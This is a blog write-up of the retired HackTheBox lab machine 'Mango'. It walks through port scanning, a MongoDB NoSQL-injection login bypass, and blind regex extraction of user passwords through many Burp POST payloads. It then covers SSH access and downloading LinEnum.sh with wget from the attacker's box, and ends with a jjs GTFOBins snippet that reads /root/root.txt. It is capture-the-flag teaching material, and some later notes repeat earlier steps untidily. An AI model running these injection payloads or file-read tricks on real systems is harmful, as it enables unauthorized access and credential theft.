HacktheBox.eu - Retired - Mango
Recon
As always I start with a simple up/down scan on all TCP ports
nmap -T4 -p- -oX ./nmapb.xml 10.10.10.162
Then I convert that to HTML
# xsltproc ./nmapb.xml -o ./nmapb.html
Looks like port 22, 80 and 443 are open.
Let's scan again with -A to finger os/services
# nmap -T4 -A -p 22,80,443 -oX ./nmapf.xml 10.10.10.162
Then convert it to HTML again
# xsltproc ./nmapf.xml -o nmapf.html
Ok so port 22 is SSH, Port 80 and 443 are Apache 2.4.29
Here is what we see on 443
Dirbuster found this
This is one of the fist boxes I've done that actually required messing with my hosts file
So if you look at the certificate for the site
I added staging-order.mabgo.htb to my /etc/hosts file and now we see
Let's dirbuster this bad boy and see if we can find anything else
During the scan it found this folder /vendor/composer/
Which is a dependency manager for php
Usually there is a installed.json file in that directory according to the documentation
Let's see..
Yup and looky there MongoDB… I think this is where the box draws the name mango from.
Exploit
This site gives us some things to try to bypass auth
I caught the login in burpsuite and sent it to repeater and added
username[$ne]=toto&password[$ne]=toto&login=login
Which redirects us to
So the auth bypass worked and got us to this new home.php page
Found this blog post with his python script that we can use to enumerate
python nosqli-user-pass-enum.py -u http://staging-order.mango.htb/index.php -up username -pp password -ep username -op login:login -m POST
Cool got a couple of users admin & mango
I tried using this same script to get the password but no luck
Popping back over to burp we can try to start to narrow down the password
Using this POST
Let's start with finding out how long the password is
We can test the length of the password by using regex to count th
For example this will test if the password is 13 characters or longer.
If we get a redirect the expression was true, if we don't get a redirect the expression was false.
For example we get no redirect with this so the password is less than 13 characters
username=admin&password[$regex]=.{13}&login=login
But we do get a redirect with
username=admin&password[$regex]=.{12}&login=login
So the password should be 12 characters for admin
Mango got this one a redirect
username=mango&password[$regex]=.{16}&login=login
So mango's password is 16 characters
So we can use burp to see if we get redirects on the password too
We can use regex to step through the password, once again using the redirect as a true false indicator
So we if you don't know much about regex like I did when I started this box check out these resources
So one of the things about regex is they have what is referred to as MetaCharacters. These are characters that have operating power in regex
The MetaCharacters are ] \ ^ - these are also normal characters in the traditional character set so if we need to use them in a search we would need to escape them using the \ for example if we want to search for a \ in a text we should need to actually input \\ so that it will escape the special meaning in regex and just treat it as a normal character. So escaping all the MetaCharacters would look like this \\ \] \^ \-
This will be important later.
Let's take a look at one of these metacharacters because we are going to need to use its special function in our search. The ^ (carrot). The Carrot will match the starting position within a string, so it matches against the first letter.
We can also use [ ] brackets to supply a list to test against, it will attempt to match for anything inside the brackets
So the ^[1] will check to see if the first character is a 1
We can also use ranges inside the brackets like [0-9]
So ^[0-9] will check if the first character is a number, other ranges we will use are a-z and A-Z which will look for alpha characters lowercase and uppercase.
And we can stack them too
So ^[a-zA-z0-9] will check the first character to see if its alpha numeric or not
The next metacharacter we need to know about is the . period, which will match anything except line break, since the passwords won't have a line break we don't need to really worry about that part.
We can use the period in combination with curly brackets .{} to supply a character number to point our expression at.
So if we do .{12}{a-z]
This will look at the 12th character and see if its a lower case alpha character.
Okay I think that's all you need to know to follow my logic going forward
Let me show my character sets I'm going to use to figure out what the character is
A-Z
A-z
0-9
~!@#$%*()_+{}|:"<>?=[;',./ -- its okay for some regex operators to appear in this list as long as what follows them doesn't actually do any type of logic
And also my escaped metacharacters
\]\\\^\-
Let's start with admin and see if we can figure out what the first character is
I start with a pretty broad set to narrow down what it could be
username=admin&password[$regex]=^[a-zA-Z0-9]&login=login
This will search all alpha (upper and lower) as well as numbers if this doesn't return a redirect I'll replace everything in the [ ] with my special character sets
As you can see we got the redirect option, so we know the first character is alphanumeric.
So the next step is to remove one of the ranges and see if it still evaluates as true and gives us the redirect
Here is the post data
username=admin&password[$regex]=^[a-zA-Z]&login=login
As you can see i removed the 0-9 so now it will only try to match the alpha characters
Still giving us the redirect so it's an alpha character, so lets try to remove the capitals and see what happens
username=admin&password[$regex]=^[a-z]&login=login
Still works, so we know its a lower case alpha character, it's just going to take some more trial and error. I'm going to divide the alpha in half( or at least close to it)
This time I'm just going to look from a-m
username=admin&password[$regex]=^[a-m]&login=login
Ok no redirect to follow so the first character comes after m in the alphabet so I'll adjust to n-z to see if evaluates true again
username=admin&password[$regex]=^[n-z]&login=login
Cool so now we will just keep narrowing down the range of lowercase alphas until we get to one that doesn't give us a redirect, so we can deduce that we have removed the correct character
Let's try n-v next
Yup that came back, so we will just keep trimming away until it doesn't, hopefully you understand the logic I'm using here by now.
Ok when we dropped down to n-s we didn't get our redirect
So since the last letter I removed was a t, i think that is the start of the admin password let's now try to evaluate just on a t
username=admin&password[$regex]=^[t]&login=login
Cool the first letter is a t
Let's introduce the next step to try and get the next letter.
Lets add . to our regex
You might remember the period is essentially a wild card. So we are going to say here is ^ find the first starting character, but skip it using the period to evaluate against the next letter. So really just check the second letter
username=admin&password[$regex]=^.[a-zA-z0-9]&login=login
Cool we got the redirect, which means the second letter is an alphanumeric, let's strip out the numbers to see if its alpha or numeric
username=admin&password[$regex]=^.[a-zA-z]&login=login
No redirect so the statement is no longer true, lets try just numbers now
username=admin&password[$regex]=^.[0-9]&login=login
Then I just used trial and error to get down to 9
The second character is a 9
username=admin&password[$regex]=^.[9]&login=login
Now we can almost finish with logic here , but I want to introduce one more regex thing
{}
Curly brackets if we put curly brackets in with a number, we are saying match the previous thing a specific number of times
So .{4} would result in …. 4 of the wild cards and {.1} would just be one . and .{22} would be 22 periods.
So since we have the first two characters we will use the curly brackets to add more wild card characters for us.
So we will put .{2} to put in two wild cards in front of what we are matching for which is now the third letter
username=admin&password[$regex]=^.{2}[a-zA-Z0-9]&login=login
We got redirection, so it alpha numeric
Let's take out the number again 0-9
Still redirects.. Okay so it's a letter, but is it upper or lower
username=admin&password[$regex]=^.{2}[A-Z]&login=login
It's upper, process of elimination got us down to k
So we move to the next character, we will need to increment our curly brackets to 3 so it will compare against the 4 character. Also we will reset our search to include a-zA-Z0-9
And just keep repeating this process until we get our password
t9KcS3>!0B#2
Eventually we got that as the admin password and now we just repeat this whole process for mango's password
h3mXK8RhU~f{]f5H
Cool we got passwords now and when we enter them on the staging-order.mango.htb page we move to the under plantation page
Now we can put away our regex and burp suite for now.
Let's see if we can SSH as mango or admin
Admin didn't work, but guess what???
Mango does!!!!
Sudo password for mango didn't work
Bummer
Let's get linenum.sh over here and see what we can see…
I wonder if i can su to admin now?
yup
Let's get the user hash since we can now
User hash
79bf***************************
Cool let's get root
Let's fire up simpleHTTPServer on our attacking box in the directory holding our LinEnum.sh
python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
On mango I naviated to the tmp directory made a new folder for me and used wget to download it
mango@mango:/tmp/circusmonkey$ wget http://10.10.14.19:8000/LinEnum.sh
Gave myself execute
And ran it
In this in the output
Googling around for jjs and found some GTFObins for JJS
Found this GTFObin for reading files………
echo 'var BufferedReader = Java.type("java.io.BufferedReader");
var FileReader = Java.type("java.io.FileReader");
var br = new BufferedReader(new FileReader("file_to_read"));
while ((line = br.readLine()) != null) { print(line); }' | jjs
Modified it to be /root/root.txt
And bam we got root.txt
That was quick
$ echo 'var BufferedReader = Java.type("java.io.BufferedReader");
>
> var FileReader = Java.type("java.io.FileReader");
>
> var br = new BufferedReader(new FileReader("/root/root.txt"));
>
> while ((line = br.readLine()) != null) { print(line); }' | jjs
Warning: The jjs tool is planned to be removed from a future JDK release
jjs> var BufferedReader = Java.type("java.io.BufferedReader");
jjs>
jjs> var FileReader = Java.type("java.io.FileReader");
jjs>
jjs> var br = new BufferedReader(new FileReader("/root/root.txt"));
jjs>
jjs> while ((line = br.readLine()) != null) { print(line); }
8a********************************
username=admin&password[$regex]=^[t]&login=login
This got a redirect so I think the first character is a t
Then we can start moving down the line
username=admin&password[$regex]=^.[abcdefghijklmnopqrtuvwxyz]&login=login
This checks if the second character is a lower case character no
Nope
username=admin&password[$regex]=^.[1234567890]&login=login
This however did get a redirect so I just stepped through the numbers
Until i got to
username=admin&password[$regex]=^.[9]&login=login
A bit later I figured out I could shorten this with [0-9] which will mean it matches a number between 0 and 9
I used
0-9
A-z
A-Z
To narrow down the character as a starting point
Which means the second character is a 9
So so far we know the password for admin starts with ^9
Next I found K
So t9K
Next if found c
So t9Kc
Finally i got the admin password down to
t9KcS3>!0B#2
I'm going to apply the same logic for the password for mango
First character is also ^
h3mXK8RhU~f{]f5H
POST /index.php HTTP/1.1
Host: staging-order.mango.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
Connection: close
Cookie: PHPSESSID=vqvnfiib8jlurb0rkjgqabp3d0
Upgrade-Insecure-Requests: 1
username=admin&password[$regex]=^...[c]&login=login
Comments
Post a Comment